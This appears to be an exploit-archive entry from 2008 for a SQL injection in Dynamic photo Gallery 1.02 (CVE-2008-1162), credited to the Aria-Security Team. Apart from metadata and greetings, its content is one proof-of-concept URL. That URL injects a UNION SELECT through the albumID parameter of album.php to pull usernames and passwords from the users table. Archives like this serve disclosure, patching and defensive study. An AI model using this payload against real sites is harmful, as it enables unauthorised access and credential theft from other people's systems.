EXPLOITS

Dynamic photo Gallery 1.02 - 'albumID' SQL Injection

Author: Aria-Security Team
type: webapps
platform: php
port: 
date_added: 2008-02-29  
date_updated: 2016-11-15  
verified: 1  
codes: OSVDB-42498;CVE-2008-1162  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5211.txt  

Aria-Security Team
http://Aria-Security.Net
----------------------------
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521

PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/users


Regards
The-0utl4w

# milw0rm.com [2008-03-01]